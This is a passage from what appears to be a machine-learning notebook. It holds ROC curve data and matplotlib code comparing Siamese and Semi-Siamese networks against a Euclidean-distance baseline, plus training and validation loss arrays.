0.46774193548387094, 0.46774193548387094, 0.46774193548387094, 0.46774193548387094, 0.46774193548387094, 0.46774193548387094, 0.4838709677419355, 0.5161290322580645, 0.5161290322580645, 0.5161290322580645, 0.5161290322580645, 0.532258064516129, 0.532258064516129, 0.532258064516129, 0.532258064516129, 0.532258064516129, 0.532258064516129, 0.532258064516129, 0.532258064516129, 0.532258064516129, 0.532258064516129, 0.5483870967741935, 0.5483870967741935, 0.5483870967741935, 0.5483870967741935, 0.5645161290322581, 0.5645161290322581, 0.5645161290322581, 0.5645161290322581, 0.5645161290322581, 0.5645161290322581, 0.5645161290322581, 0.5645161290322581, 0.5645161290322581, 0.5645161290322581, 0.5645161290322581, 0.5645161290322581, 0.5645161290322581, 0.5645161290322581, 0.5806451612903226, 0.5806451612903226, 0.5806451612903226, 0.5806451612903226, 0.5806451612903226, 0.5806451612903226, 0.5806451612903226, 0.5967741935483871, 0.5967741935483871, 0.5967741935483871, 0.5967741935483871, 0.5967741935483871, 0.5967741935483871, 0.5967741935483871, 0.6129032258064516, 0.6129032258064516, 0.6129032258064516, 0.6129032258064516, 0.6129032258064516, 0.6129032258064516, 0.6129032258064516, 0.6129032258064516, 0.6129032258064516, 0.6129032258064516, 0.6290322580645161, 0.6290322580645161, 0.6290322580645161, 0.6290322580645161, 0.6290322580645161, 0.6290322580645161, 0.6290322580645161, 0.6290322580645161, 0.6290322580645161, 0.6290322580645161, 0.6290322580645161, 0.6451612903225806, 0.6451612903225806, 0.6451612903225806, 0.6451612903225806, 0.6612903225806451, 0.6612903225806451, 0.6612903225806451, 0.6774193548387096, 0.6935483870967742, 0.6935483870967742, 0.6935483870967742, 0.6935483870967742, 0.6935483870967742, 0.7096774193548387, 0.7096774193548387, 0.7096774193548387, 0.7096774193548387, 0.7258064516129032, 0.7258064516129032, 0.7258064516129032, 0.7258064516129032, 0.7258064516129032, 0.7258064516129032, 0.7258064516129032, 0.7258064516129032, 0.7258064516129032, 0.7258064516129032, 0.7258064516129032, 0.7258064516129032, 0.7258064516129032, 0.7258064516129032, 0.7258064516129032, 0.7258064516129032, 0.7258064516129032, 0.7419354838709677, 0.7580645161290323, 0.7580645161290323, 0.7580645161290323, 0.7741935483870968, 0.7741935483870968, 0.7903225806451613, 0.7903225806451613, 0.7903225806451613, 0.7903225806451613, 0.7903225806451613, 0.7903225806451613, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8064516129032258, 0.8225806451612904, 0.8225806451612904, 0.8225806451612904, 0.8387096774193549, 0.8387096774193549, 0.8387096774193549, 0.8387096774193549, 0.8387096774193549, 0.8387096774193549, 0.8387096774193549, 0.8387096774193549, 0.8387096774193549, 0.8548387096774194, 0.8548387096774194, 0.8548387096774194, 0.8548387096774194, 0.8548387096774194, 0.8548387096774194, 0.8548387096774194, 0.8548387096774194, 0.8548387096774194, 0.8548387096774194, 0.8548387096774194, 0.8548387096774194, 0.8548387096774194, 0.8548387096774194, 0.8548387096774194, 0.8548387096774194, 0.8548387096774194, 0.8548387096774194, 0.8548387096774194, 0.8548387096774194, 0.8548387096774194, 0.8548387096774194, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8709677419354839, 0.8870967741935484, 0.8870967741935484, 0.8870967741935484, 0.8870967741935484, 0.8870967741935484, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9032258064516129, 0.9193548387096774, 0.9193548387096774, 0.9193548387096774, 0.9193548387096774, 0.9193548387096774, 0.9354838709677419, 0.9354838709677419, 0.9354838709677419, 0.9354838709677419, 0.9354838709677419, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065, 0.9516129032258065] , [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.017241379310344827, 0.017241379310344827, 0.017241379310344827, 0.017241379310344827, 0.017241379310344827, 0.017241379310344827, 0.017241379310344827, 0.017241379310344827, 0.017241379310344827, 0.034482758620689655, 0.034482758620689655, 0.034482758620689655, 0.05172413793103448, 0.05172413793103448, 0.05172413793103448, 0.05172413793103448, 0.05172413793103448, 0.05172413793103448, 0.05172413793103448, 0.05172413793103448, 0.05172413793103448, 0.05172413793103448, 0.05172413793103448, 0.05172413793103448, 0.05172413793103448, 0.05172413793103448, 0.06896551724137931, 0.06896551724137931, 0.06896551724137931, 0.06896551724137931, 0.06896551724137931, 0.06896551724137931, 0.06896551724137931, 0.06896551724137931, 0.06896551724137931, 0.06896551724137931, 0.06896551724137931, 0.06896551724137931, 0.08620689655172414, 0.08620689655172414, 0.08620689655172414, 0.08620689655172414, 0.08620689655172414, 0.08620689655172414, 0.08620689655172414, 0.08620689655172414, 0.08620689655172414, 0.08620689655172414, 0.08620689655172414, 0.08620689655172414, 0.08620689655172414, 0.08620689655172414, 0.08620689655172414, 0.08620689655172414, 0.08620689655172414, 0.08620689655172414, 0.08620689655172414, 0.08620689655172414, 0.08620689655172414, 0.10344827586206896, 0.10344827586206896, 0.10344827586206896, 0.10344827586206896, 0.1206896551724138, 0.1206896551724138, 0.1206896551724138, 0.1206896551724138, 0.1206896551724138, 0.1206896551724138, 0.1206896551724138, 0.1206896551724138, 0.1206896551724138, 0.13793103448275862, 0.13793103448275862, 0.13793103448275862, 0.13793103448275862, 0.13793103448275862, 0.13793103448275862, 0.13793103448275862, 0.1724137931034483, 0.1724137931034483, 0.1724137931034483, 0.1724137931034483, 0.1724137931034483, 0.1724137931034483, 0.1724137931034483, 0.1724137931034483, 0.1896551724137931, 0.20689655172413793, 0.20689655172413793, 0.20689655172413793, 0.22413793103448276, 0.25862068965517243, 0.25862068965517243, 0.25862068965517243, 0.25862068965517243, 0.27586206896551724, 0.29310344827586204, 0.29310344827586204, 0.3103448275862069, 0.3103448275862069, 0.3275862068965517, 0.3275862068965517, 0.3275862068965517, 0.3275862068965517, 0.3448275862068966, 0.3448275862068966, 0.3620689655172414, 0.3620689655172414, 0.3620689655172414, 0.3793103448275862, 0.3793103448275862, 0.3793103448275862, 0.39655172413793105, 0.39655172413793105, 0.39655172413793105, 0.39655172413793105, 0.39655172413793105, 0.39655172413793105, 0.39655172413793105, 0.39655172413793105, 0.39655172413793105, 0.39655172413793105, 0.39655172413793105, 0.41379310344827586, 0.41379310344827586, 0.41379310344827586, 0.41379310344827586, 0.43103448275862066, 0.43103448275862066, 0.43103448275862066, 0.43103448275862066, 0.43103448275862066, 0.43103448275862066, 0.43103448275862066, 0.43103448275862066, 0.4482758620689655, 0.4482758620689655, 0.46551724137931033, 0.46551724137931033, 0.46551724137931033, 0.46551724137931033, 0.46551724137931033, 0.46551724137931033, 0.46551724137931033, 0.46551724137931033, 0.46551724137931033, 0.4827586206896552, 0.5172413793103449, 0.5172413793103449, 0.5172413793103449, 0.5172413793103449, 0.5172413793103449, 0.5344827586206896, 0.5344827586206896, 0.5344827586206896, 0.5344827586206896, 0.5344827586206896, 0.5344827586206896, 0.5344827586206896, 0.5344827586206896, 0.5344827586206896, 0.5344827586206896, 0.5344827586206896, 0.5344827586206896, 0.5689655172413793, 0.5689655172413793, 0.5689655172413793, 0.5689655172413793, 0.5689655172413793, 0.5689655172413793, 0.5862068965517241, 0.5862068965517241, 0.5862068965517241, 0.5862068965517241, 0.5862068965517241, 0.5862068965517241, 0.603448275862069, 0.603448275862069, 0.6206896551724138, 0.6206896551724138, 0.6206896551724138, 0.6206896551724138, 0.6206896551724138, 0.6206896551724138, 0.6206896551724138, 0.6379310344827587, 0.6379310344827587, 0.6379310344827587, 0.6379310344827587, 0.6379310344827587, 0.6551724137931034, 0.6551724137931034, 0.6551724137931034, 0.6551724137931034, 0.6724137931034483, 0.6724137931034483, 0.6896551724137931, 0.6896551724137931, 0.6896551724137931, 0.6896551724137931, 0.6896551724137931, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7068965517241379, 0.7241379310344828, 0.7241379310344828, 0.7413793103448276, 0.7413793103448276, 0.7413793103448276, 0.7413793103448276, 0.7413793103448276, 0.7586206896551724, 0.7586206896551724, 0.7586206896551724, 0.7586206896551724, 0.7586206896551724, 0.7586206896551724, 0.7758620689655172, 0.7758620689655172, 0.7758620689655172, 0.7758620689655172, 0.7931034482758621, 0.7931034482758621, 0.7931034482758621, 0.7931034482758621, 0.7931034482758621, 0.7931034482758621, 0.7931034482758621, 0.7931034482758621, 0.7931034482758621, 0.8103448275862069, 0.8620689655172413, 0.8620689655172413, 0.8620689655172413, 0.8620689655172413, 0.8620689655172413, 0.8620689655172413, 0.8620689655172413, 0.8620689655172413, 0.8620689655172413, 0.8620689655172413, 0.8620689655172413, 0.8620689655172413, 0.8620689655172413, 0.8620689655172413, 0.8620689655172413, 0.8620689655172413, 0.8620689655172413, 0.8620689655172413, 0.8620689655172413, 0.8793103448275862, 0.8793103448275862, 0.8793103448275862, 0.8793103448275862, 0.8793103448275862, 0.8793103448275862, 0.8793103448275862, 0.8793103448275862, 0.8793103448275862, 0.8793103448275862, 0.8793103448275862, 0.8793103448275862, 0.8793103448275862, 0.8793103448275862, 0.8793103448275862, 0.8793103448275862, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.896551724137931, 0.9137931034482759, 0.9137931034482759, 0.9137931034482759, 0.9137931034482759, 0.9137931034482759, 0.9137931034482759, 0.9137931034482759, 0.9137931034482759, 0.9137931034482759, 0.9137931034482759, 0.9137931034482759, 0.9137931034482759, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9310344827586207, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9482758620689655, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9655172413793104, 0.9827586206896551, 0.9827586206896551, 0.9827586206896551, 0.9827586206896551, 0.9827586206896551, 0.9827586206896551, 0.9827586206896551, 0.9827586206896551, 0.9827586206896551, 0.9827586206896551, 0.9827586206896551, 0.9827586206896551, 0.9827586206896551, 0.9827586206896551, 0.9827586206896551, 0.9827586206896551, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0] %matplotlib inline font = {'size' : 20} matplotlib.rc('font', **font) fig_size = [10,10] plt.rcParams["figure.figsize"] = fig_size plt.axis('equal') plt.plot(x1, y1, 'b-.', label="Euclidean Distance") plt.plot(x2, y2, 'y--', label="Siamese ResNet") plt.plot(x4, y4, 'g:', label="Siamese SqueezeNet") plt.plot(x3, y3, 'r-', label="Semi-Siamese Network") plt.legend(loc='lower right', prop={'size': 20}) plt.xlabel('FPR', fontdict={'fontsize':20}) plt.ylabel('TPR', fontdict={'fontsize':20}) plt.axis('equal') # plt.title('Result on '+phase+' Data') axes = plt.gca() axes.set_xlim([-0.01, 1.01]) axes.set_ylim([-0.01, 1.01]) plt.show() loss_train = [4.4655, 4.2521, 4.1725, 4.1246, 4.0728, 3.8587, 3.9498, 3.9919, 3.8827, 3.8968, 3.9915, 3.8605, 3.8418, 3.7651, 3.9590, 3.8681, 3.9711, 3.6758, 3.8847, 3.8248, 3.8759, 3.7360, 3.8323, 3.7280, 3.7588, 3.7985, 3.6798, 3.8482, 3.9560, 3.8690, 3.8542, 3.7909, 3.8081, 3.6867, 3.8059, 3.8307, 3.7410, 3.8696, 3.7513, 3.8688, 3.6938, 3.7417, 3.8292, 3.8368, 3.7547, 3.6842, 3.9347, 3.8454, 3.8748, 3.7735, 3.5992, 3.7979, 3.8979, 3.7557, 3.8158, 3.7596, 3.8078, 3.9020, 3.8653, 4.0029, 3.6647, 3.8253, 3.7371, 3.7674, 3.9188, 3.9050, 4.0148, 3.8174, 3.7205, 4.0928, 3.7858, 3.8835, 3.9060, 3.8093, 3.7889, 3.7284, 3.8775, 3.8357, 3.8253, 3.6354, 3.6397, 3.8565, 3.8687, 3.8874, 3.9948, 3.8176, 3.7557, 3.6577, 3.7143, 3.8242, 3.9107, 3.8974, 3.7826, 3.7446, 3.8735, 3.8790, 3.8599, 3.7681, 3.8609, 3.9374,] loss_val = [4.2644, 4.6022, 6.1745, 4.1170, 4.5958, 3.9062, 3.9156, 4.2027, 4.1506, 5.0428, 4.4080, 4.1711, 4.6245, 4.3260, 4.0514, 4.1181, 4.4435, 4.0262, 4.2743, 4.1910, 4.2874, 4.4387, 3.9186, 4.3923, 4.3637, 4.8640, 4.0048, 4.1939, 4.8270, 4.4657, 4.4441, 4.2456, 3.9262, 4.2140, 4.4151, 4.0230, 4.1857, 4.1594, 4.6407, 4.5859, 4.4277, 4.1604, 4.3410, 4.6541, 4.1013, 4.1526, 4.4693, 3.8926, 4.3638, 4.3524, 4.2512, 3.9800, 4.1352, 4.5946, 4.1261, 4.5393, 4.3123, 4.1407, 3.7365, 4.2107, 3.9650, 4.2301, 4.4351, 4.5525, 4.1203, 4.3653, 4.3156, 4.3476, 3.8617, 3.9145, 4.6624, 4.2847, 4.4377, 4.3604, 4.2985, 4.6417, 4.4340, 4.3786, 3.6240, 4.0985, 4.0712, 4.0163, 4.0735, 4.3497, 4.1751, 4.3959, 4.5499, 4.3857, 3.8553, 4.3035, 4.6984, 4.1772, 4.2948, 4.3471, 4.1601, 4.4616, 3.8350, 4.0570, 4.4019, 4.1189,] # from slurm-832012.out %matplotlib inline font = {'size' : 20} matplotlib.rc('font', **font) fig_size = [6,6] plt.rcParams["figure.figsize"] = fig_size plt.plot(range(1, len(loss_train)+1), loss_train, 'b-', label="Train Loss") plt.plot(range(1, len(loss_val)+1), loss_val, 'r:', label="Test Loss") plt.legend(loc='upper right') plt.xlabel('Epoch') plt.ylabel('Loss') # plt.axis('equal') plt.title('Siamese Network') # axes = plt.gca() # axes.set_xlim([-0.01, 1.01]) # axes.set_ylim([-0.01, 1.01]) plt.show() loss_train = [0.6982, 0.6461, 0.5877, 0.5605, 0.5446, 0.5005, 0.4790, 0.4651, 0.4381, 0.4321, 0.4031, 0.4190, 0.4147, 0.3932, 0.3809, 0.3972, 0.3821, 0.3738, 0.3898, 0.3679, 0.3750, 0.3635, 0.3951, 0.3590, 0.3834, 0.3758, 0.3786, 0.3877, 0.3736, 0.3793, 0.3798, 0.3858, 0.3907, 0.3773, 0.3825, 0.3782, 0.3606, 0.3737, 0.3731, 0.3749, 0.3921, 0.3825, 0.3770, 0.3676, 0.3543, 0.3646, 0.3825, 0.3657, 0.3722, 0.3836, 0.3756, 0.3713, 0.3794, 0.3759, 0.3761, 0.3548, 0.3718, 0.3895, 0.3774, 0.3708, 0.3570, 0.3828, 0.3646, 0.3775, 0.3678, 0.3700, 0.3578, 0.3650, 0.3632, 